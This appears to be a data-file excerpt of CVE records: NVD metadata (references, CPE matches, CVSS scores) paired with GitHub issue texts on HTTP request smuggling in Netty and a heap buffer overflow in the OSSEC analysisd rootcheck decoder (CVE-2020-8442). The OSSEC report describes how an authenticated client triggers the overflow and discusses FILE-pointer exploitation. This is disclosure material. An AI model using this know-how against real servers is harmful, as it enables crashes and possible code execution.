null, "url": "https://lists.apache.org/thread.html/rbdb59c683d666130906a9c05a1d2b034c4cc08cda7ed41322bd54fe2%40%3Cissues.flume.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26%40%3Ccommits.pulsar.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e%40%3Cissues.flink.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rdb69125652311d0c41f6066ff44072a3642cf33a4b5e3c4f9c1ec9c2%40%3Ccommits.pulsar.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/re45ee9256d3233c31d78e59ee59c7dc841c7fbd83d0769285b41e948%40%3Ccommits.druid.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rf5b2dfb7401666a19915f8eaef3ba9f5c3386e2066fcd2ae66e16a2f%40%3Cdev.flink.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.apache.org/thread.html/rff210a24f3a924829790e69eaefa84820902b7b31f17c3bf2def9114%40%3Ccommits.druid.apache.org%3E" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00017.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00004.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4532-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4885" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0497" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0567" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0601" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0605" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0606" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0804" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0805" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0806" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2020:0811" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/netty/netty/issues/9861" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r030beff88aeb6d7a2d6cd21342bd18686153ce6e26a4171d0e035663%40%3Cissues.flume.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r1fcccf8bdb3531c28bc9aa605a6a1bea7e68cef6fc12e01faafb2fb5%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r205937c85817a911b0c72655c2377e7a2c9322d6ef6ce1b118d34d8d%40%3Cdev.geode.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r2f2989b7815d809ff3fda8ce330f553e5f133505afd04ffbc135f35f%40%3Cissues.spark.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r36fcf538b28f2029e8b4f6b9a772f3b107913a78f09b095c5b153a62%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r46f93de62b1e199f3f9babb18128681677c53493546f532ed88c359d%40%3Creviews.spark.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r4d3f1d3e333d9c2b2f6e6ae8ed8750d4de03410ac294bcd12c7eefa3%40%3Ccommits.cassandra.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r4ff40646e9ccce13560458419accdfc227b8b6ca4ead3a8a91decc74%40%3Cissues.flume.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r640eb9b3213058a963e18291f903fc1584e577f60035f941e32f760a%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r6945f3c346b7af89bbd3526a7c9b705b1e3569070ebcd0964bcedd7d%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2%40%3Ccommits.druid.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r7790b9d99696d9eddce8a8c96f13bb68460984294ea6fea3800143e4%40%3Ccommits.pulsar.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r804895eedd72c9ec67898286eb185e04df852b0dd5fe53cf5b6138f9%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r81700644754e66ffea465c869cb477de25f8041e21598e8818fc2c45%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r832724df393a7ef25ca4c7c2eb83ad2d6c21c74569acda5233f9f1ec%40%3Ccommits.pulsar.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r959474dcf7f88565ed89f6252ca5a274419006cb71348f14764b183d%40%3Ccommits.cassandra.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r96e08f929234e8ba1ef4a93a0fd2870f535a1f9ab628fabc46115986%40%3Cdev.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/ra1a71b576a45426af5ee65255be9596ff3181a342f4ba73b800db78f%40%3Cdev.geode.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/ra2ace4bcb5cf487f72cbcbfa0f8cc08e755ec2b93d7e69f276148b08%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/ra9fbfe7d4830ae675bf34c7c0f8c22fc8a4099f65706c1bc4f54c593%40%3Cissues.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/raaac04b7567c554786132144bea3dcb72568edd410c1e6f0101742e7%40%3Cissues.flink.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rb5c065e7bd701b0744f9f28ad769943f91745102716c1eb516325f11%40%3Cissues.spark.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f%40%3Ccommits.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rbdb59c683d666130906a9c05a1d2b034c4cc08cda7ed41322bd54fe2%40%3Cissues.flume.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26%40%3Ccommits.pulsar.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e%40%3Cissues.flink.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rdb69125652311d0c41f6066ff44072a3642cf33a4b5e3c4f9c1ec9c2%40%3Ccommits.pulsar.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/re45ee9256d3233c31d78e59ee59c7dc841c7fbd83d0769285b41e948%40%3Ccommits.druid.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rf5b2dfb7401666a19915f8eaef3ba9f5c3386e2066fcd2ae66e16a2f%40%3Cdev.flink.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b%40%3Cnotifications.zookeeper.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.apache.org/thread.html/rff210a24f3a924829790e69eaefa84820902b7b31f17c3bf2def9114%40%3Ccommits.druid.apache.org%3E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00017.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00004.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4532-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2021/dsa-4885" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*", "matchCriteriaId": "3D374B9C-E87A-47F2-AF0C-25D2A6D03E89", "versionEndExcluding": "4.1.44", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:jboss_amq_clients:2:*:*:*:*:*:*:*", "matchCriteriaId": "491FADFF-AE11-4EDE-BD6B-64856292CA62", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.2:*:*:*:*:*:*:*", "matchCriteriaId": "0C3AA5CE-9ACB-4E96-A4C1-50A662D641FB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:jboss_enterprise_application_platform:7.3:*:*:*:*:*:*:*", "matchCriteriaId": "B4911A72-5FAE-47C5-A141-2E3CA8E1CCAB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "matchCriteriaId": "2F6AB192-9D7D-4A9A-8995-E53A9DE9EAFC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "matchCriteriaId": "142AD0DD-4CF3-4D74-9442-459CE3347E3A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:apache:spark:2.4.7:*:*:*:*:*:*:*", "matchCriteriaId": "AE120F70-6F8C-474A-B83F-A4F48581CEB0", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:apache:spark:2.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "63630C2A-F68C-491B-A5A5-FC15D44927CF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "444" ]
444
https://github.com/netty/netty/issues/9861
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "netty", "netty" ]
### Expected behavior 1.Only accept one Content-Length.RFC 7230 says `duplicate Content-Length header fields have been generated or combined by an upstream message processor, then the recipient MUST either reject the message as invalid or replace the duplicated field-values with a single valid Content-Length`. 2.Only accept identity and chunked Transport-Encoding In this implementation, the order does not matter (it probably should). The Go implementation only uses the first value of the header.Seems to be in sync with the behaviour of AWS ALB. All other valid (gzip, compress, etc.) and invalid TE will return a 501, since we don't have readers for them I figured this was the right move, but feel free to correct me ### Actual behavior 1. But netty accept all. 2.Netty accpet random TE. ### Steps to reproduce Use two CL to reproduce the first. Use a chunked TE header and a random TE header. Smiliar with [9571](https://github.com/netty/netty/issues/9571). It also cause http smuggling. Or see the other issue [benoitc/gunicorn#2176](https://github.com/benoitc/gunicorn/issues/2176) and the PR [benoitc/gunicorn#2181](https://github.com/benoitc/gunicorn/pull/2181) ### Minimal yet complete reproducer code (or URL to code) ### Netty version all ### JVM version (e.g. `java -version`) ### OS version (e.g. `uname -a`)
Non-proper handling of Content-Length and Transfer-Encoding: chunked headers
https://api.github.com/repos/netty/netty/issues/9861/comments
24
2019-12-09T18:54:41Z
2020-02-24T09:13:05Z
https://github.com/netty/netty/issues/9861
535,148,204
9,861
1,048
CVE-2020-8442
2020-01-30T01:15:10.713
In OSSEC-HIDS 2.7 through 3.5.0, the server component responsible for log analysis (ossec-analysisd) is vulnerable to a heap-based buffer overflow in the rootcheck decoder component via an authenticated client.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1820" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1821" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202007-33" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.ossec.net/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1820" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1821" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202007-33" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.ossec.net/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ossec:ossec:*:*:*:*:*:*:*:*", "matchCriteriaId": "B349E3E6-F70E-41A0-843D-202A82473ABD", "versionEndExcluding": null, "versionEndIncluding": "3.5.0", "versionStartExcluding": null, "versionStartIncluding": "2.7", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/ossec/ossec-hids/issues/1820
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ossec", "ossec-hids" ]
The `ossec-analysisd` rootcheck decoder (`src/analysisd/decoders/rootcheck.c`) allocates two fixed size heap buffers via global static vars. One, `rk_agent_ips` is an array of `*char` size `MAX_AGENTS`. The other `rk_agent_fps` is an array of `*FILE`, also size `MAX_AGENTS`. In a default build MAX_AGENTS is 2048. https://github.com/ossec/ossec-hids/blob/abb36d4460b9f44ee90790d1138192bb01a2b21c/src/analysisd/decoders/rootcheck.c#L21-L22 When processing rootcheck messages the `RK_File` function is called to find a file pointer for the given agent name. In `RK_File` a `while` loop with a index counter `i` is used to try and find an index of `rk_agent_ips` that matches the provided `agent` name. No check of `i` is made to ensure that it stays within the bound of `MAX_AGENT`, resulting in a straight-forward heap buffer overflow when more than `MAX_AGENT` syscheck update messages for distinct agent names are processed. This code was introduced in the original `rootcheck` functionality with 5546ed6fb97c3e507a3b3f9d571990f0a12f9d96 on Oct 9, 2005. I believe it affects OSSEC v2.7+. This is triggerable via an authenticated client through the `ossec-remoted`. The client needs only write MAX_AGENT rootcheck update messages with distinct message agent names. While `ossec-remoted` always sets the agent name portion of messages passed on to `ossec-analysisd` with a prefix out of the attackers control based on the agent key and src IP (`($NAME) $SRCPIP->`) the portion after this prefix is attacker controlled and thus can be mutated to make more than MAX_AGENT unique names that will be decoded by the `ossec-analysisd`. Notably this bug has fairly high potential for exploitation. The attacker is able to overwrite a *FILE pointer with a pointer to the agent name, which is mostly attacker controlled (minus a short prefix), and can be up to 255 - strlen(prefix) bytes long. I'm definitely able to reliably segfault the `ossec-analysisd` process with this bug though I was personally unable to achieve control of execution. Overwriting a *FILE pointer with a pointer to attacker controlled data is a common way to achieve reliable code execution. There are many pointers in the FILE struct to be abused and while libc has added some hardening it isn't applicable for versions 2.24 or lower (e.g. Ubuntu 16.04) and bypass techniques are well known. https://outflux.net/blog/archives/2011/12/22/abusing-the-file-structure/ https://dhavalkapil.com/blogs/FILE-Structure-Exploitation/ https://www.slideshare.net/AngelBoy1/play-with-file-structure-yet-another-binary-exploit-technique In this case there are two additional challenges to exploiting the bug that stumped me but may not stump someone who is actually good at writing exploits :-) 1. Since the protocol is all string based you can't use a null byte in payload that overwrites the *FILE contents which makes specifying valid pointers on x86_64 very challenging. (You get one terminating \0 at the end of your payload which can be used for the high order byte of a pointer, but it's still a challenge to find useful targets in high mem). 2. Getting your overwritten `rk_agent_fps` entry used with `fseek` requires being able to specify the `rk_agent_ips` name at the matching `i` value. Usually this is the first bytes of a valid `FILE` and so I _think_ the attacker needs full control of the agent name to be able to specify a match (usually `\200,\255\373` or similar. The value is predictable based on rootcheck's `open` flags). If I'm correct this might mean the segfault is remotely triggerable but exploiting the FILE overwrite may not be. To fix this the `while` conditions in `DB_File` and `DB_SetCompleted` should be rewritten to short circuit if `i >= MAX_AGENTS`: E.g. instead of: ``` while (i < MAX_AGENTS) { ``` Use: ``` while (i < MAX_AGENTS && rk_agent_ips[i] != NULL) { ``` I think it's worth noting that this bug is nearly identical to the one reported by Paul Southerington in the syscheck decoder, patched in Feb 2012: https://github.com/ossec/ossec-hids/commit/91aa29aeb84d1f125a898308a01ffbf50f4480b8 It looks like this was fixed in Wazuh's OSSEC fork at some point, though potentially without realizing it fixed a vulnerability: https://github.com/wazuh/wazuh/blob/413b72b17070350b62b2176c2bdc310cc66d30f6/src/analysisd/decoders/rootcheck.c#L77 This seems like a place where process improvement could help. Receiving vulnerability reports should trigger a search through the codebase for equivalent problems.
CVE-2020-8442: analysisd rootcheck decoder: heap overflow in DB_File.
https://api.github.com/repos/ossec/ossec-hids/issues/1820/comments
1
2020-01-15T21:01:47Z
2020-01-30T14:35:31Z
https://github.com/ossec/ossec-hids/issues/1820
550,427,271
1,820
1,049
CVE-2020-8442
2020-01-30T01:15:10.713
In OSSEC-HIDS 2.7 through 3.5.0, the server component responsible for log analysis (ossec-analysisd) is vulnerable to a heap-based buffer overflow in the rootcheck decoder component via an authenticated client.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1820" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1821" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202007-33" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://www.ossec.net/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1820" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ossec/ossec-hids/issues/1821" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202007-33" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.ossec.net/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ossec:ossec:*:*:*:*:*:*:*:*", "matchCriteriaId": "B349E3E6-F70E-41A0-843D-202A82473ABD", "versionEndExcluding": null, "versionEndIncluding": "3.5.0", "versionStartExcluding": null, "versionStartIncluding": "2.7", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/ossec/ossec-hids/issues/1821
[ "Third Party Advisory" ]
github.com
[ "ossec", "ossec-hids" ]
